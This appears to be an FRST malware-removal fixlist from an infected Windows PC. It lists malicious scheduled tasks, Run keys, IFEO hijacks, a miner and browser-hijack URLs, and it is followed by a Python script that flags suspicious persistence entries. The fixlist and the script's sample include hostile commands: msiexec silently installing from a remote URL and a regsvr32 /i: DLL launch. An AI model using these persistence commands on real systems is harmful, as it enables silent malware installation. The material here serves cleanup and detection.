Task: {08B220ED-CA63-47C0-9B96-D2E786BF8F95} - System32\Tasks\Hmechhebity Engine => C:\Program Files (x86)\Guqasp\xckehither.exe
Task: {35E3854B-B5D3-40F3-B506-B09AC0377F47} - System32\Tasks\Online Special Application V2G2 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {3FA55C77-A4F6-4C43-9942-AD689BB4982D} - \{0E057A47-0D09-047E-0A11-050E0B7F1105} -> No File <==== ATTENTION
Task: {40DD700B-4A6B-47B3-BCCB-68C47C3E4333} - \Arilile -> No File <==== ATTENTION
Task: {7347C4FD-5AF2-4A9A-92DB-63850708F081} - System32\Tasks\{724FF862-C5E4-4FC9-BE51-5F528FA2872A} => C:\ProgramData\{2B503F68-9CFB-88C3-E447-8D56CAAA9236}\A7C6278E-106D-9025-035E-B160DBE6199D.exe <==== ATTENTION
Task: {89EEBA59-2405-45B9-BE45-3F9841163E15} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] ()
Task: {8FEC6B15-A25B-4396-BB08-A9352F283B32} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic
Task: {95BA9DB4-0939-40A0-9F2E-27B2238AD73A} - System32\Tasks\Online Special Application V2G1 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {9D7C3408-FDCE-4C5D-A262-92319F6F32C6} - System32\Tasks\Updater_Online_Special_Application => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== ATTENTION
Task: {A5EB08BF-A84C-4AC4-B892-591E4D26A10D} - System32\Tasks\Online Special Application V2G3 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {CB64652F-D53B-42F3-8917-068748F6954D} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {DD0ADC35-75A7-4934-871D-CCDF5A376D89} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] ()
Task: {FFE0E285-252E-477A-AC58-72B9786038E1} - System32\Tasks\{E75C0273-D8D6-D893-53C3-288602D0B879} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\90361a19\aa2c3b22.dll" <==== ATTENTION
Task: C:\Windows\Tasks\Online Special Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Special Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Special Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Special_Application.job => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== ATTENTION
Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Hosts:
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "PWAS4BY1OC4T7L5"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "4FAWBDTDAXQ7DGI"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "isMiner V 1.9"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "BA70O5FIV3OXQ52"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "RV45SKF07USE2PP"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [isMiner V 1.9] => "C:\Users\Zrujnowanyxd9\AppData\Roaming\isMiner\isMiner.exe" -checkforupdates <===== ATTENTION
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [BA70O5FIV3OXQ52] => "C:\Program Files\HYEYHKX74K\UNKDPJ383.exe"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [RV45SKF07USE2PP] => "C:\Program Files\YRYA2O7AI7\YRYA2O7AI.exe"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [4FAWBDTDAXQ7DGI] => "C:\Program Files\G35JLTG9OW\G35JLTG9O.exe"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [PWAS4BY1OC4T7L5] => "C:\Program Files (x86)\PubHotspot\0L26I.exe"
HKU\S-1-5-18\...\Run: [] => [X]
IFEO\OSppSvc.exe: [Debugger] KMS-R@1nHook.exe
IFEO\SppExtComObj.exe: [Debugger] KMS-R@1nHook.exe
ShellExecuteHooks: No Name - {7E69FF54-20E2-11E7-8377-64006A5CFC23} - C:\Users\Zrujnowanyxd9\AppData\Roaming\Rizientqols\Jevosreerwuther.dll -> No File
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\Software\Microsoft\Internet Explorer\Main,Start Page =
Edge HomeButtonPage: HKU\S-1-5-21-3012374695-455075304-3318307465-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493304631&z=2474c01d7afa64bcfdd74c7g3zbtecfcfefzeqfz4o&from=che0812&uid=TOSHIBAXHDWD110_27QKMLGFSXX27QKMLGFSX
CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3cseoKgOZCfOxi3r1IvpT9T0yYU-_9_QgGmeBWqvu_bzTBlzCcOjsWyFsoNfEtGpdpWTVZCJ4hTMj_558r8T2ucgrwQ4NTPB0GLYob-Of61rJp7eJw_B9XNIOcHhqhvvbWhclF3JsbIfa7f0Y6stfoSJZ-uLV-Bg,
CHR StartupUrls: Default -> "hxxp://www.google.pl/","hxxps://www.facebook.com/","hxxp://www.sony.pl/support/pl/content/cnt-dwnl/prd-comp/win7downgrade_svf_8821","chrome://downloads/","chrome://newtab/","chrome://chrome-signin/?source=0","hxxp://www.ourluckysites.com/?type=hp&ts=1493304631&z=2474c01d7afa64bcfdd74c7g3zbtecfcfefzeqfz4o&from=che0812&uid=TOSHIBAXHDWD110_27QKMLGFSXX27QKMLGFSX"
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1493304631&z=2474c01d7afa64bcfdd74c7g3zbtecfcfefzeqfz4o&from=che0812&uid=TOSHIBAXHDWD110_27QKMLGFSXX27QKMLGFSX&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
2017-04-27 16:55 - 2017-04-27 16:55 - 00003562 _____ C:\Windows\System32\Tasks\T0528
2017-04-27 16:52 - 2017-04-27 16:53 - 00000000 ____D C:\Users\Zrujnowanyxd9\AppData\LocalLow\Mozilla
2017-04-27 16:52 - 2017-04-27 16:52 - 00002069 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-27 16:52 - 2017-04-27 16:52 - 00001999 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-27 16:52 - 2017-04-27 16:52 - 00000000 ___HD C:\Users\Zrujnowanyxd9\AppData\Local\Everness
2017-04-27 16:51 - 2017-04-27 16:51 - 00000000 ____D C:\ProgramData\Apple
2017-04-27 16:51 - 2017-04-27 16:51 - 00000000 ____D C:\Program Files (x86)\Everness
2017-04-26 15:55 - 2017-04-26 15:55 - 00000000 ____D C:\Windows\psgo
2017-04-26 15:55 - 2017-04-26 15:55 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-26 15:53 - 2017-04-26 21:32 - 00000000 ____D C:\Program Files (x86)\Guqasp
2017-04-16 21:30 - 2017-04-27 19:29 - 00000000 ____D C:\AdwCleaner
2017-04-16 15:05 - 2017-04-27 19:28 - 00000398 _____ C:\Windows\Tasks\Online Special Application V2G3.job
2017-04-16 15:05 - 2017-04-27 19:28 - 00000398 _____ C:\Windows\Tasks\Online Special Application V2G2.job
2017-04-16 15:05 - 2017-04-27 19:28 - 00000398 _____ C:\Windows\Tasks\Online Special Application V2G1.job
2017-04-16 15:05 - 2017-04-27 19:08 - 00000446 _____ C:\Windows\Tasks\Updater_Online_Special_Application.job
2017-04-16 15:05 - 2017-04-16 15:05 - 00003356 _____ C:\Windows\System32\Tasks\Updater_Online_Special_Application
2017-04-16 15:05 - 2017-04-16 15:05 - 00003304 _____ C:\Windows\System32\Tasks\Online Special Application V2G3
2017-04-16 15:05 - 2017-04-16 15:05 - 00003304 _____ C:\Windows\System32\Tasks\Online Special Application V2G2
2017-04-16 15:05 - 2017-04-16 15:05 - 00003304 _____ C:\Windows\System32\Tasks\Online Special Application V2G1
2017-04-16 15:04 - 2017-04-16 15:04 - 00003988 _____ C:\Windows\System32\Tasks\{724FF862-C5E4-4FC9-BE51-5F528FA2872A}
2017-04-16 15:04 - 2017-04-16 15:04 - 00003898 _____ C:\Windows\System32\Tasks\{E75C0273-D8D6-D893-53C3-288602D0B879}
EmptyTemp:
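Added example, not part of the fixlist above and not FRST's own logic: a small Python triage that parses FRST-style Task, Run and IFEO entries and explains why each one deserves a look. The heuristics are my own, chosen from the indicators visible in the fixlist (msiexec installing from a URL, regsvr32 /n /i: on a DLL under PROGRA~3, an IFEO Debugger pointing at KMS-R@1nHook.exe, GUID-named tasks and directories, random-looking upper-case names, tasks whose binary is "No File"). The sample entries are copied from the fixlist; the rule names and thresholds (for example the 9-16 character random-name shape) are assumptions, not anything FRST documents.

```python
"""Triage of FRST-style persistence entries.

Added example, not FRST code. Heuristics are the author's own, taken from the
indicators visible in the fixlist this accompanies.
"""
import re
from dataclasses import dataclass

# Constructed sample: entries copied from the fixlist above, one per line.
SAMPLE = r"""
Task: {CB64652F-D53B-42F3-8917-068748F6954D} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {FFE0E285-252E-477A-AC58-72B9786038E1} - System32\Tasks\{E75C0273-D8D6-D893-53C3-288602D0B879} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\90361a19\aa2c3b22.dll"
Task: {40DD700B-4A6B-47B3-BCCB-68C47C3E4333} - \Arilile -> No File
Task: {7347C4FD-5AF2-4A9A-92DB-63850708F081} - System32\Tasks\{724FF862-C5E4-4FC9-BE51-5F528FA2872A} => C:\ProgramData\{2B503F68-9CFB-88C3-E447-8D56CAAA9236}\A7C6278E-106D-9025-035E-B160DBE6199D.exe
Task: {89EEBA59-2405-45B9-BE45-3F9841163E15} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] ()
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [isMiner V 1.9] => "C:\Users\Zrujnowanyxd9\AppData\Roaming\isMiner\isMiner.exe" -checkforupdates
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\Run: [BA70O5FIV3OXQ52] => "C:\Program Files\HYEYHKX74K\UNKDPJ383.exe"
IFEO\OSppSvc.exe: [Debugger] KMS-R@1nHook.exe
"""

# Entry shapes as FRST prints them: optional registration GUID, then name, then action.
TASK_RE = re.compile(r"^Task: (?:\{[^}]+\} - )?(.+?) (?:=>|->) (.+)$")
RUN_RE = re.compile(r"^HK\w+\\(?:[^\\]+\\)?\.\.\.\\Run: \[(.*?)\] => (.+)$")
IFEO_RE = re.compile(r"^IFEO\\(\S+): \[Debugger\] (.+)$")
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://", re.I)          # accepts defanged hxxp too
GUID_RE = re.compile(r"\{[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}\}", re.I)
# Assumed shape of generated names seen in the fixlist (HYEYHKX74K, BA70O5FIV3OXQ52):
# upper-case letters and digits only, both present, 9 to 16 characters.
RANDOM_NAME_RE = re.compile(r"^(?=.*[A-Z])(?=.*\d)[A-Z0-9]{9,16}$")


@dataclass
class Finding:
    kind: str       # "Task", "Run" or "IFEO"
    name: str       # task path, Run value name, or hijacked image name
    target: str     # what the entry launches
    reasons: list


def parse_entry(line):
    """Return (kind, name, target) for the entry types modelled here, else None."""
    line = line.strip()
    for kind, rx in (("Task", TASK_RE), ("Run", RUN_RE), ("IFEO", IFEO_RE)):
        m = rx.match(line)
        if m:
            return kind, m.group(1), m.group(2)
    return None


def _name_tokens(name, target):
    """The entry name plus each path segment of the target, quotes and extension stripped."""
    tokens = [name]
    for seg in target.split("\\"):
        first = seg.split()[0].strip('"') if seg.split() else ""
        tokens.append(re.sub(r"\.[A-Za-z]{2,4}$", "", first))
    return tokens


def assess(kind, name, target):
    """Return the reasons an entry deserves a look; an empty list means nothing odd."""
    reasons = []
    low = target.lower()
    if target == "No File":
        reasons.append("dangling entry: the binary it pointed at is gone")
    if kind == "IFEO":
        reasons.append(f"IFEO Debugger hijack: every start of {name} runs {target} instead")
    if "msiexec" in low and " /i " in low and URL_RE.search(target):
        reasons.append("msiexec installing a package fetched from a URL")
    if "regsvr32" in low and "/i:" in low and " /n" in low:
        reasons.append("regsvr32 /n /i: calls DllInstall on a non-system DLL, skipping registration")
    if re.search(r"\\progra~3\\|\\programdata\\", low):
        reasons.append("executes from ProgramData")
    if kind == "Run" and re.search(r"\\appdata\\(roaming|local)\\", low):
        reasons.append("autorun from the user profile rather than an installed location")
    if GUID_RE.search(name) or GUID_RE.search(target):
        reasons.append("GUID used as a task or directory name")
    if any(RANDOM_NAME_RE.match(tok) for tok in _name_tokens(name, target)):
        reasons.append("random-looking upper-case alphanumeric name")
    return reasons


def triage(text):
    """Parse every modelled entry in `text` and keep those with at least one reason."""
    findings = []
    for line in text.splitlines():
        parsed = parse_entry(line)
        if parsed is None:
            continue
        reasons = assess(*parsed)
        if reasons:
            findings.append(Finding(*parsed, reasons))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"[{f.kind}] {f.name}\n    -> {f.target}")
        for r in f.reasons:
            print(f"       * {r}")
```

Run against the sample, the two Gyazo updater tasks come back clean while the remote msiexec task, the regsvr32 task, the dangling task, the GUID-named ProgramData task, both Run values and the IFEO entry are each listed with the reason they tripped. Feeding it a whole FRST Addition.txt works the same way; lines of other kinds are simply skipped.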